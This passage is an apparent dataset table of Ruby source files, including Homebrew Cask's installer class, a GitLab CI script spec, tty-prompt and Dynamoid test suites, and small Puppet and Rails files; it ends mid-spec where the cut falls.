hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e2d7a24e2cd235416ee9a58e3c2a019d55523c4e | 15,333 | # frozen_string_literal: true
require "rubygems"
require "formula_installer"
require "unpack_strategy"
require "cask/cask_dependencies"
require "cask/config"
require "cask/download"
require "cask/staged"
require "cask/verify"
require "cask/quarantine"
require "cgi"
module Cask
class Installer
extend Predicable
# TODO: it is unwise for Cask::Staged to be a module, when we are
# dealing with both staged and unstaged Casks here. This should
# either be a class which is only sometimes instantiated, or there
# should be explicit checks on whether staged state is valid in
# every method.
include Staged
def initialize(cask, command: SystemCommand, force: false,
skip_cask_deps: false, binaries: true, verbose: false,
require_sha: false, upgrade: false,
installed_as_dependency: false, quarantine: true)
@cask = cask
@command = command
@force = force
@skip_cask_deps = skip_cask_deps
@binaries = binaries
@verbose = verbose
@require_sha = require_sha
@reinstall = false
@upgrade = upgrade
@installed_as_dependency = installed_as_dependency
@quarantine = quarantine
end
attr_predicate :binaries?, :force?, :skip_cask_deps?, :require_sha?,
:reinstall?, :upgrade?, :verbose?, :installed_as_dependency?,
:quarantine?
def self.caveats(cask)
odebug "Printing caveats"
caveats = cask.caveats
return if caveats.empty?
<<~EOS
#{ohai_title "Caveats"}
#{caveats}
EOS
end
def fetch
odebug "Cask::Installer#fetch"
satisfy_dependencies
verify_has_sha if require_sha? && !force?
download
verify
end
def stage
odebug "Cask::Installer#stage"
Caskroom.ensure_caskroom_exists
unpack_dependencies
extract_primary_container
save_caskfile
rescue => e
purge_versioned_files
raise e
end
def install
odebug "Cask::Installer#install"
old_config = @cask.config
raise CaskAlreadyInstalledError, @cask if @cask.installed? && !force? && !reinstall? && !upgrade?
check_conflicts
print caveats
fetch
uninstall_existing_cask if reinstall?
backup if force? && @cask.staged_path.exist? && @cask.metadata_versioned_path.exist?
oh1 "Installing Cask #{Formatter.identifier(@cask)}"
opoo "macOS's Gatekeeper has been disabled for this Cask" unless quarantine?
stage
@cask.config = Config.global.merge(old_config)
install_artifacts
::Utils::Analytics.report_event("cask_install", @cask.token) unless @cask.tap&.private?
purge_backed_up_versioned_files
puts summary
rescue
restore_backup
raise
end
def check_conflicts
return unless @cask.conflicts_with
@cask.conflicts_with[:cask].each do |conflicting_cask|
conflicting_cask = CaskLoader.load(conflicting_cask)
raise CaskConflictError.new(@cask, conflicting_cask) if conflicting_cask.installed?
rescue CaskUnavailableError
next # Ignore conflicting Casks that do not exist.
end
end
def reinstall
odebug "Cask::Installer#reinstall"
@reinstall = true
install
end
def uninstall_existing_cask
return unless @cask.installed?
# use the same cask file that was used for installation, if possible
installed_caskfile = @cask.installed_caskfile
installed_cask = installed_caskfile.exist? ? CaskLoader.load(installed_caskfile) : @cask
# Always force uninstallation, ignore method parameter
Installer.new(installed_cask, binaries: binaries?, verbose: verbose?, force: true, upgrade: upgrade?).uninstall
end
def summary
s = +""
s << "#{Emoji.install_badge} " if Emoji.enabled?
s << "#{@cask} was successfully #{upgrade? ? "upgraded" : "installed"}!"
s.freeze
end
def download
odebug "Downloading"
@downloaded_path = Download.new(@cask, force: false, quarantine: quarantine?).perform
odebug "Downloaded to -> #{@downloaded_path}"
@downloaded_path
end
def verify_has_sha
odebug "Checking cask has checksum"
return unless @cask.sha256 == :no_check
raise CaskNoShasumError, @cask.token
end
def verify
Verify.all(@cask, @downloaded_path)
end
def primary_container
@primary_container ||= begin
UnpackStrategy.detect(@downloaded_path, type: @cask.container&.type, merge_xattrs: true)
end
end
def extract_primary_container
odebug "Extracting primary container"
odebug "Using container class #{primary_container.class} for #{@downloaded_path}"
basename = CGI.unescape(File.basename(@cask.url.path))
if nested_container = @cask.container&.nested
Dir.mktmpdir do |tmpdir|
tmpdir = Pathname(tmpdir)
primary_container.extract(to: tmpdir, basename: basename, verbose: verbose?)
FileUtils.chmod_R "+rw", tmpdir/nested_container, force: true, verbose: verbose?
UnpackStrategy.detect(tmpdir/nested_container, merge_xattrs: true)
.extract_nestedly(to: @cask.staged_path, verbose: verbose?)
end
else
primary_container.extract_nestedly(to: @cask.staged_path, basename: basename, verbose: verbose?)
end
return unless quarantine?
return unless Quarantine.available?
Quarantine.propagate(from: @downloaded_path, to: @cask.staged_path)
end
def install_artifacts
already_installed_artifacts = []
odebug "Installing artifacts"
artifacts = @cask.artifacts
odebug "#{artifacts.length} artifact/s defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:install_phase)
odebug "Installing artifact of class #{artifact.class}"
if artifact.is_a?(Artifact::Binary)
next unless binaries?
end
artifact.install_phase(command: @command, verbose: verbose?, force: force?)
already_installed_artifacts.unshift(artifact)
end
save_config_file
rescue => e
begin
already_installed_artifacts.each do |artifact|
next unless artifact.respond_to?(:uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
already_installed_artifacts.each do |artifact|
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Reverting installation of artifact of class #{artifact.class}"
artifact.post_uninstall_phase(command: @command, verbose: verbose?, force: force?)
end
ensure
purge_versioned_files
raise e
end
end
# TODO: move dependencies to a separate class,
# dependencies should also apply for `brew cask stage`,
# override dependencies with `--force` or perhaps `--force-deps`
def satisfy_dependencies
return unless @cask.depends_on
ohai "Satisfying dependencies"
macos_dependencies
arch_dependencies
x11_dependencies
formula_dependencies
cask_dependencies unless skip_cask_deps? || installed_as_dependency?
end
def macos_dependencies
return unless @cask.depends_on.macos
return if @cask.depends_on.macos.satisfied?
raise CaskError, @cask.depends_on.macos.message(type: :cask)
end
def arch_dependencies
return if @cask.depends_on.arch.nil?
@current_arch ||= { type: Hardware::CPU.type, bits: Hardware::CPU.bits }
return if @cask.depends_on.arch.any? do |arch|
arch[:type] == @current_arch[:type] &&
Array(arch[:bits]).include?(@current_arch[:bits])
end
raise CaskError,
"Cask #{@cask} depends on hardware architecture being one of " \
"[#{@cask.depends_on.arch.map(&:to_s).join(", ")}], " \
"but you are running #{@current_arch}"
end
def x11_dependencies
return unless @cask.depends_on.x11
raise CaskX11DependencyError, @cask.token unless MacOS::X11.installed?
end
def formula_dependencies
formulae = @cask.depends_on.formula.map { |f| Formula[f] }
return if formulae.empty?
if formulae.all?(&:any_version_installed?)
puts "All Formula dependencies satisfied."
return
end
not_installed = formulae.reject(&:any_version_installed?)
ohai "Installing Formula dependencies: #{not_installed.map(&:to_s).join(", ")}"
not_installed.each do |formula|
FormulaInstaller.new(formula).tap do |fi|
fi.installed_as_dependency = true
fi.installed_on_request = false
fi.show_header = true
fi.verbose = verbose?
fi.prelude
fi.install
fi.finish
end
end
end
def cask_dependencies
casks = CaskDependencies.new(@cask)
return if casks.empty?
if casks.all?(&:installed?)
puts "All Cask dependencies satisfied."
return
end
not_installed = casks.reject(&:installed?)
ohai "Installing Cask dependencies: #{not_installed.map(&:to_s).join(", ")}"
not_installed.each do |cask|
Installer.new(
cask,
binaries: binaries?,
verbose: verbose?,
installed_as_dependency: true,
force: false,
).install
end
end
def unpack_dependencies
formulae = primary_container.dependencies.select { |dep| dep.is_a?(Formula) }
casks = primary_container.dependencies.select { |dep| dep.is_a?(Cask) }
.flat_map { |cask| [*CaskDependencies.new(cask), cask] }
not_installed_formulae = formulae.reject(&:any_version_installed?)
not_installed_casks = casks.reject(&:installed?)
return if (not_installed_formulae + not_installed_casks).empty?
ohai "Satisfying unpack dependencies"
not_installed_formulae.each do |formula|
FormulaInstaller.new(formula).tap do |fi|
fi.installed_as_dependency = true
fi.installed_on_request = false
fi.show_header = true
fi.verbose = verbose?
fi.prelude
fi.install
fi.finish
end
end
not_installed_casks.each do |cask|
Installer.new(cask, verbose: verbose?, installed_as_dependency: true).install
end
end
def caveats
self.class.caveats(@cask)
end
def save_caskfile
old_savedir = @cask.metadata_timestamped_path
return unless @cask.sourcefile_path
savedir = @cask.metadata_subdir("Casks", timestamp: :now, create: true)
FileUtils.copy @cask.sourcefile_path, savedir
old_savedir&.rmtree
end
def save_config_file
@cask.config_path.atomic_write(@cask.config.to_json)
end
def uninstall
oh1 "Uninstalling Cask #{Formatter.identifier(@cask)}"
uninstall_artifacts(clear: true)
remove_config_file unless reinstall? || upgrade?
purge_versioned_files
purge_caskroom_path if force?
end
def remove_config_file
FileUtils.rm_f @cask.config_path
@cask.config_path.parent.rmdir_if_possible
end
def start_upgrade
uninstall_artifacts
backup
end
def backup
@cask.staged_path.rename backup_path
@cask.metadata_versioned_path.rename backup_metadata_path
end
def restore_backup
return unless backup_path.directory? && backup_metadata_path.directory?
Pathname.new(@cask.staged_path).rmtree if @cask.staged_path.exist?
Pathname.new(@cask.metadata_versioned_path).rmtree if @cask.metadata_versioned_path.exist?
backup_path.rename @cask.staged_path
backup_metadata_path.rename @cask.metadata_versioned_path
end
def revert_upgrade
opoo "Reverting upgrade for Cask #{@cask}"
restore_backup
install_artifacts
end
def finalize_upgrade
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
purge_backed_up_versioned_files
puts summary
end
def uninstall_artifacts(clear: false)
odebug "Uninstalling artifacts"
artifacts = @cask.artifacts
odebug "#{artifacts.length} artifact/s defined", artifacts
artifacts.each do |artifact|
next unless artifact.respond_to?(:uninstall_phase)
odebug "Uninstalling artifact of class #{artifact.class}"
artifact.uninstall_phase(command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?)
end
artifacts.each do |artifact|
next unless artifact.respond_to?(:post_uninstall_phase)
odebug "Post-uninstalling artifact of class #{artifact.class}"
artifact.post_uninstall_phase(
command: @command, verbose: verbose?, skip: clear, force: force?, upgrade: upgrade?,
)
end
end
def zap
ohai %Q(Implied "brew cask uninstall #{@cask}")
uninstall_artifacts
if (zap_stanzas = @cask.artifacts.select { |a| a.is_a?(Artifact::Zap) }).empty?
opoo "No zap stanza present for Cask '#{@cask}'"
else
ohai "Dispatching zap stanza"
zap_stanzas.each do |stanza|
stanza.zap_phase(command: @command, verbose: verbose?, force: force?)
end
end
ohai "Removing all staged versions of Cask '#{@cask}'"
purge_caskroom_path
end
def backup_path
return if @cask.staged_path.nil?
Pathname("#{@cask.staged_path}.upgrading")
end
def backup_metadata_path
return if @cask.metadata_versioned_path.nil?
Pathname("#{@cask.metadata_versioned_path}.upgrading")
end
def gain_permissions_remove(path)
Utils.gain_permissions_remove(path, command: @command)
end
def purge_backed_up_versioned_files
# versioned staged distribution
gain_permissions_remove(backup_path) if backup_path&.exist?
# Homebrew Cask metadata
return unless backup_metadata_path.directory?
backup_metadata_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
backup_metadata_path.rmdir_if_possible
end
def purge_versioned_files
ohai "Purging files for version #{@cask.version} of Cask #{@cask}"
# versioned staged distribution
gain_permissions_remove(@cask.staged_path) if @cask.staged_path&.exist?
# Homebrew Cask metadata
if @cask.metadata_versioned_path.directory?
@cask.metadata_versioned_path.children.each do |subdir|
gain_permissions_remove(subdir)
end
@cask.metadata_versioned_path.rmdir_if_possible
end
@cask.metadata_master_container_path.rmdir_if_possible unless upgrade?
# toplevel staged distribution
@cask.caskroom_path.rmdir_if_possible unless upgrade?
end
def purge_caskroom_path
odebug "Purging all staged versions of Cask #{@cask}"
gain_permissions_remove(@cask.caskroom_path)
end
end
end
| 29.429942 | 117 | 0.663732 |
1ddf7881e81121f6019c79c57677dceb300df619 | 2,610 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Ci::Config::Entry::Script do
let(:entry) { described_class.new(config) }
describe 'validations' do
context 'when entry config value is array of strings' do
let(:config) { %w(ls pwd) }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq config
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry config value is array of arrays of strings' do
let(:config) { [['ls'], ['pwd', 'echo 1']] }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq ['ls', 'pwd', 'echo 1']
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry config value is array containing strings and arrays of strings' do
let(:config) { ['ls', ['pwd', 'echo 1']] }
describe '#value' do
it 'returns array of strings' do
expect(entry.value).to eq ['ls', 'pwd', 'echo 1']
end
end
describe '#errors' do
it 'does not append errors' do
expect(entry.errors).to be_empty
end
end
describe '#valid?' do
it 'is valid' do
expect(entry).to be_valid
end
end
end
context 'when entry value is string' do
let(:config) { 'ls' }
describe '#errors' do
it 'saves errors' do
expect(entry.errors)
.to include 'script config should be an array containing strings and arrays of strings'
end
end
describe '#valid?' do
it 'is not valid' do
expect(entry).not_to be_valid
end
end
end
context 'when entry value is multi-level nested array' do
let(:config) { [['ls', ['echo 1']], 'pwd'] }
describe '#errors' do
it 'saves errors' do
expect(entry.errors)
.to include 'script config should be an array containing strings and arrays of strings'
end
end
describe '#valid?' do
it 'is not valid' do
expect(entry).not_to be_valid
end
end
end
end
end
| 23.727273 | 99 | 0.557471 |
33dc5821cac35fadaa1680bd2cf5a7d8b8d7fbec | 973 | require 'test_helper'
class CartsControllerTest < ActionDispatch::IntegrationTest
setup do
@cart = carts(:one)
end
test "should get index" do
get carts_url
assert_response :success
end
test "should get new" do
get new_cart_url
assert_response :success
end
test "should create cart" do
assert_difference('Cart.count') do
post carts_url, params: { cart: { total: @cart.total } }
end
assert_redirected_to cart_url(Cart.last)
end
test "should show cart" do
get cart_url(@cart)
assert_response :success
end
test "should get edit" do
get edit_cart_url(@cart)
assert_response :success
end
test "should update cart" do
patch cart_url(@cart), params: { cart: { total: @cart.total } }
assert_redirected_to cart_url(@cart)
end
test "should destroy cart" do
assert_difference('Cart.count', -1) do
delete cart_url(@cart)
end
assert_redirected_to carts_url
end
end
| 19.857143 | 67 | 0.685509 |
2844bbbcacb9233d070c85016eca6255f33edaeb | 612 | class Billing < ActiveRecord::Base
validates :number, uniqueness: true
validates :number, presence: true
validates :project_id, presence: true
validates :period_id, presence: true
# validates :person_id, presence: true
validates :user, presence: true
validates :billing_date, presence: true
validates :status, presence: true
belongs_to :project
belongs_to :period
belongs_to :person
belongs_to :user
has_many :receive_amounts
scope :outstanding, -> {where(status: '0')}
scope :received, -> {where(status: '1')}
end
| 30.6 | 46 | 0.656863 |
ac8512b66fada5fcefc357fccbc0b27a25eb00cd | 5,230 | # frozen_string_literal: true
RSpec.describe TTY::Prompt, "#ask" do
subject(:prompt) { TTY::Prompt::Test.new }
it "asks question" do
prompt.ask("What is your name?")
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "asks an empty question " do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask
expect(answer).to eq(nil)
expect(prompt.output.string).to eql("\e[2K\e[1G\n\e[1A\e[2K\e[1G\n")
end
it "asks an empty question and returns nil if EOF is sent to stdin" do
prompt.input << nil
prompt.input.rewind
answer = prompt.ask("")
expect(answer).to eql(nil)
expect(prompt.output.string).to eq("\e[1A\e[2K\e[1G\n")
end
it "asks an empty question with prepopulated value" do
prompt.input << "\n"
prompt.input.rewind
answer = prompt.ask value: "yes"
expect(answer).to eq("yes")
expect(prompt.output.string).to eq([
"yes\e[2K\e[1G",
"yes\n\e[1A\e[2K\e[1G",
"\e[32myes\e[0m\n"
].join)
end
it "asks question with prepopulated value" do
prompt = TTY::Prompt::Test.new prefix: "> "
prompt.input << "\n"
prompt.input.rewind
answer = prompt.ask("Say?") do |q|
q.value "yes"
end
expect(answer).to eq("yes")
expect(prompt.output.string).to eq([
"> Say? yes\e[2K\e[1G",
"> Say? yes\n\e[1A\e[2K\e[1G",
"> Say? \e[32myes\e[0m\n"
].join)
end
it "asks a question with a prefix [?]" do
prompt = TTY::Prompt::Test.new(prefix: "[?] ")
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask "Are you Polish?"
expect(answer).to eq(nil)
expect(prompt.output.string).to eq([
"[?] Are you Polish? ",
"\e[2K\e[1G[?] Are you Polish? \n",
"\e[1A\e[2K\e[1G",
"[?] Are you Polish? \n"
].join)
end
it "asks a question with block" do
prompt.input << ""
prompt.input.rewind
answer = prompt.ask "What is your name?" do |q|
q.default "Piotr"
end
expect(answer).to eq("Piotr")
expect(prompt.output.string).to eq([
"What is your name? \e[90m(Piotr)\e[0m ",
"\e[1A\e[2K\e[1G",
"What is your name? \e[32mPiotr\e[0m\n"
].join)
end
it "changes question color" do
prompt.input << ""
prompt.input.rewind
options = {default: "Piotr", help_color: :red, active_color: :cyan}
answer = prompt.ask("What is your name?", **options)
expect(answer).to eq("Piotr")
expect(prompt.output.string).to eq([
"What is your name? \e[31m(Piotr)\e[0m ",
"\e[1A\e[2K\e[1G",
"What is your name? \e[36mPiotr\e[0m\n"
].join)
end
it "permits empty default parameter" do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask("What is your name?", default: "")
expect(answer).to eq("")
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[2K\e[1GWhat is your name? \n",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "permits nil default parameter" do
prompt.input << "\r"
prompt.input.rewind
answer = prompt.ask("What is your name?", default: nil)
expect(answer).to eq(nil)
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[2K\e[1GWhat is your name? \n",
"\e[1A\e[2K\e[1G",
"What is your name? \n"
].join)
end
it "sets quiet mode" do
prompt.ask("What is your name?", quiet: true)
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G"
].join)
end
it "sets quiet mode through DSL" do
prompt.ask("What is your name?") do |q|
q.quiet true
end
expect(prompt.output.string).to eq([
"What is your name? ",
"\e[1A\e[2K\e[1G"
].join)
end
it "overwrites global settings" do
active = ->(str) { Pastel.new.cyan(str) }
help = Pastel.new.red.detach
global_settings = {prefix: "[?] ", active_color: active, help_color: help}
prompt = TTY::Prompt::Test.new(**global_settings)
prompt.input << "Piotr\r"
prompt.input.rewind
prompt.ask("What is your name?")
prompt.input << "Piotr\r"
prompt.input.rewind
local_settings = {prefix: ":-) ", active_color: :blue, help_color: :magenta}
prompt.ask("What is your name?", **local_settings)
expect(prompt.output.string).to eq([
"[?] What is your name? ",
"\e[2K\e[1G[?] What is your name? P",
"\e[2K\e[1G[?] What is your name? Pi",
"\e[2K\e[1G[?] What is your name? Pio",
"\e[2K\e[1G[?] What is your name? Piot",
"\e[2K\e[1G[?] What is your name? Piotr",
"\e[2K\e[1G[?] What is your name? Piotr\n",
"\e[1A\e[2K\e[1G",
"[?] What is your name? \e[36mPiotr\e[0m\n",
":-) What is your name? ",
"\e[2K\e[1G:-) What is your name? P",
"\e[2K\e[1G:-) What is your name? Pi",
"\e[2K\e[1G:-) What is your name? Pio",
"\e[2K\e[1G:-) What is your name? Piot",
"\e[2K\e[1G:-) What is your name? Piotr",
"\e[2K\e[1G:-) What is your name? Piotr\n",
"\e[1A\e[2K\e[1G",
":-) What is your name? \e[34mPiotr\e[0m\n"
].join)
end
end
| 27.382199 | 80 | 0.574187 |
e87307c006de7d1cae378afed01042d9370f8e52 | 1,182 | require 'facter'
require File.join(File.dirname(__FILE__), '..', 'jenkins.rb')
require File.join(File.dirname(__FILE__), '..', 'jenkins/plugins.rb')
module Puppet
module Jenkins
module Facts
# Method to call the Facter DSL and dynamically add facts at runtime.
#
# This method is necessary to add reasonable RSpec coverage for the custom
# fact
#
# @return [NilClass]
def self.install
Facter.add(:jenkins_plugins) do
confine :kernel => "Linux"
setcode do
Puppet::Jenkins::Facts.plugins_str
end
end
return nil
end
# Return a list of plugins and their versions, e.g.:
# pam-auth 1.1, pmd 3.36, rake 1.7.8
#
# @return [String] Comma-separated version of "<plugin> <version>", empty
# string if there are no plugins
def self.plugins_str
plugins = Puppet::Jenkins::Plugins.available
buffer = []
plugins.keys.sort.each do |plugin|
manifest = plugins[plugin]
buffer << "#{plugin} #{manifest[:plugin_version]}"
end
return buffer.join(', ')
end
end
end
end
| 28.829268 | 80 | 0.593063 |
bf62576cfd6f9b0f16282b3ac11a842c69787265 | 1,619 | #
# deep_merge.rb
#
module Puppet::Parser::Functions
newfunction(:deep_merge, :type => :rvalue, :doc => <<-'DOC') do |args|
@summary
Recursively merges two or more hashes together and returns the resulting hash.
@example Example usage
$hash1 = {'one' => 1, 'two' => 2, 'three' => { 'four' => 4 } }
$hash2 = {'two' => 'dos', 'three' => { 'five' => 5 } }
$merged_hash = deep_merge($hash1, $hash2)
The resulting hash is equivalent to:
$merged_hash = { 'one' => 1, 'two' => 'dos', 'three' => { 'four' => 4, 'five' => 5 } }
When there is a duplicate key that is a hash, they are recursively merged.
When there is a duplicate key that is not a hash, the key in the rightmost hash will "win."
@return [Hash] The merged hash
DOC
if args.length < 2
raise Puppet::ParseError, "deep_merge(): wrong number of arguments (#{args.length}; must be at least 2)"
end
deep_merge = proc do |hash1, hash2|
hash1.merge(hash2) do |_key, old_value, new_value|
if old_value.is_a?(Hash) && new_value.is_a?(Hash)
deep_merge.call(old_value, new_value)
else
new_value
end
end
end
result = {}
args.each do |arg|
next if arg.is_a?(String) && arg.empty? # empty string is synonym for puppet's undef
# If the argument was not a hash, skip it.
unless arg.is_a?(Hash)
raise Puppet::ParseError, "deep_merge: unexpected argument type #{arg.class}, only expects hash arguments"
end
result = deep_merge.call(result, arg)
end
return(result)
end
end
| 31.134615 | 114 | 0.607165 |
3842c7a05c789ffacffc98897995c333764b542e | 19,010 | # frozen_string_literal: true
require 'spec_helper'
describe Dynamoid::Finders do
let!(:address) { Address.create(city: 'Chicago') }
describe '.find' do
let(:klass) do
new_class(class_name: 'Document')
end
let(:klass_with_composite_key) do
new_class(class_name: 'Cat') do
range :age, :integer
end
end
context 'one primary key provided' do
context 'simple primary key' do
it 'finds' do
obj = klass.create
expect(klass.find(obj.id)).to eql(obj)
end
it 'raises RecordNotFound error when found nothing' do
klass.create_table
expect {
klass.find('wrong-id')
}.to raise_error(Dynamoid::Errors::RecordNotFound, "Couldn't find Document with primary key wrong-id")
end
end
context 'composite primary key' do
it 'finds' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find(obj.id, range_key: 12)).to eql(obj)
end
it 'raises RecordNotFound error when found nothing' do
klass_with_composite_key.create_table
expect {
klass_with_composite_key.find('wrong-id', range_key: 100_500)
}.to raise_error(Dynamoid::Errors::RecordNotFound, "Couldn't find Cat with primary key (wrong-id,100500)")
end
it 'type casts a sort key value' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find(obj.id, range_key: '12.333')).to eql(obj)
end
it 'dumps a sort key value' do
klass_with_date = new_class do
range :published_on, :date
end
date = '2018/07/26'.to_date
obj = klass_with_date.create(published_on: date)
expect(klass_with_date.find(obj.id, range_key: date)).to eql(obj)
end
end
it 'returns persisted? object' do
obj = klass.create
expect(klass.find(obj.id)).to be_persisted
end
context 'field is not declared in document' do
let(:class_with_not_declared_field) do
new_class do
field :name
end
end
before do
class_with_not_declared_field.create_table
end
it 'ignores it without exceptions' do
Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '1', bod: '1996-12-21')
obj = class_with_not_declared_field.find('1')
expect(obj.id).to eql('1')
end
end
end
context 'multiple primary keys provided' do
context 'simple primary key' do
it 'finds with an array of keys' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect(klass.find([obj1.id, obj2.id])).to match_array(objects)
end
it 'finds with one key' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find([[obj.id, obj.age]])).to eq([obj])
end
it 'returns an empty array if an empty array passed' do
klass.create_table
expect(klass.find([])).to eql([])
end
it 'raises RecordNotFound error when some objects are not found' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect {
klass.find([obj1.id, obj2.id, 'wrong-id'])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Documents with primary keys [#{obj1.id}, #{obj2.id}, wrong-id] " \
'(found 2 results, but was looking for 3)'
)
end
it 'raises RecordNotFound if only one primary key provided and no result found' do
klass.create_table
expect {
klass.find(['wrong-id'])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Documents with primary keys [wrong-id] (found 0 results, but was looking for 1)"
)
end
it 'finds with a list of keys' do
objects = (1..2).map { klass.create }
obj1, obj2 = objects
expect(klass.find(obj1.id, obj2.id)).to match_array(objects)
end
end
context 'composite primary key' do
it 'finds with an array of keys' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([[obj1.id, obj1.age], [obj2.id, obj2.age]])).to match_array(objects)
end
it 'finds with one key' do
obj = klass_with_composite_key.create(age: 12)
expect(klass_with_composite_key.find([[obj.id, obj.age]])).to eq([obj])
end
it 'returns an empty array if an empty array passed' do
klass_with_composite_key.create_table
expect(klass_with_composite_key.find([])).to eql([])
end
it 'raises RecordNotFound error when some objects are not found' do
obj = klass_with_composite_key.create(age: 12)
expect {
klass_with_composite_key.find([[obj.id, obj.age], ['wrong-id', 100_500]])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Cats with primary keys [(#{obj.id},12), (wrong-id,100500)] (found 1 results, but was looking for 2)"
)
end
it 'raises RecordNotFound if only one primary key provided and no result found' do
klass_with_composite_key.create_table
expect {
klass_with_composite_key.find([['wrong-id', 100_500]])
}.to raise_error(
Dynamoid::Errors::RecordNotFound,
"Couldn't find all Cats with primary keys [(wrong-id,100500)] (found 0 results, but was looking for 1)"
)
end
it 'finds with a list of keys' do
pending 'still is not implemented'
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([obj1.id, obj1.age], [obj2.id, obj2.age])).to match_array(objects)
end
it 'type casts a sort key value' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
expect(klass_with_composite_key.find([[obj1.id, '1'], [obj2.id, '2']])).to match_array(objects)
end
it 'dumps a sort key value' do
klass_with_date = new_class do
range :published_on, :date
end
obj1 = klass_with_date.create(published_on: '2018/07/26'.to_date)
obj2 = klass_with_date.create(published_on: '2018/07/27'.to_date)
expect(
klass_with_date.find([[obj1.id, obj1.published_on], [obj2.id, obj2.published_on]])
).to match_array([obj1, obj2])
end
end
it 'returns persisted? objects' do
objects = (1..2).map { |i| klass_with_composite_key.create(age: i) }
obj1, obj2 = objects
objects = klass_with_composite_key.find([[obj1.id, obj1.age], [obj2.id, obj2.age]])
obj1, obj2 = objects
expect(obj1).to be_persisted
expect(obj2).to be_persisted
end
context 'field is not declared in document' do
let(:class_with_not_declared_field) do
new_class do
field :name
end
end
before do
class_with_not_declared_field.create_table
end
it 'ignores it without exceptions' do
Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '1', dob: '1996-12-21')
Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '2', dob: '2001-03-14')
objects = class_with_not_declared_field.find(%w[1 2])
expect(objects.size).to eql 2
expect(objects.map(&:id)).to contain_exactly('1', '2')
end
end
context 'backoff is specified' do
before do
@old_backoff = Dynamoid.config.backoff
@old_backoff_strategies = Dynamoid.config.backoff_strategies.dup
@counter = 0
Dynamoid.config.backoff_strategies[:simple] = ->(_) { -> { @counter += 1 } }
Dynamoid.config.backoff = { simple: nil }
end
after do
Dynamoid.config.backoff = @old_backoff
Dynamoid.config.backoff_strategies = @old_backoff_strategies
end
it 'returns items' do
users = (1..10).map { User.create }
results = User.find(users.map(&:id))
expect(results).to match_array(users)
end
it 'raise RecordNotFound error when there are no results' do
User.create_table
expect {
User.find(['some-fake-id'])
}.to raise_error(Dynamoid::Errors::RecordNotFound)
end
it 'uses specified backoff when some items are not processed' do
# batch_get_item has following limitations:
# * up to 100 items at once
# * up to 16 MB at once
#
# So we write data as large as possible and read it back
# 100 * 400 KB (limit for item) = ~40 MB
# 40 MB / 16 MB = 3 times
ids = (1..100).map(&:to_s)
users = ids.map do |id|
name = ' ' * (400.kilobytes - 120) # 400KB - length(attribute names)
User.create(id: id, name: name)
end
results = User.find(users.map(&:id))
expect(results).to match_array(users)
expect(@counter).to eq 2
end
it 'uses new backoff after successful call without unprocessed items' do
skip 'it is difficult to test'
end
end
end
end
it 'sends consistent option to the adapter' do
expect(Dynamoid.adapter).to receive(:get_item)
.with(anything, anything, hash_including(consistent_read: true))
.and_call_original
Address.find(address.id, consistent_read: true)
end
context 'with users' do
it 'finds using method_missing for attributes' do
array = Address.find_by_city('Chicago')
expect(array).to eq address
end
it 'finds using method_missing for multiple attributes' do
user = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name_and_email('Josh', '[email protected]').to_a
expect(array).to eq [user]
end
it 'finds using method_missing for single attributes and multiple results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name('Josh').to_a
expect(array.size).to eq 2
expect(array).to include user1
expect(array).to include user2
end
it 'finds using method_missing for multiple attributes and multiple results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name_and_email('Josh', '[email protected]').to_a
expect(array.size).to eq 2
expect(array).to include user1
expect(array).to include user2
end
it 'finds using method_missing for multiple attributes and no results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Justin', email: '[email protected]')
array = User.find_all_by_name_and_email('Gaga', '[email protected]').to_a
expect(array).to be_empty
end
it 'finds using method_missing for a single attribute and no results' do
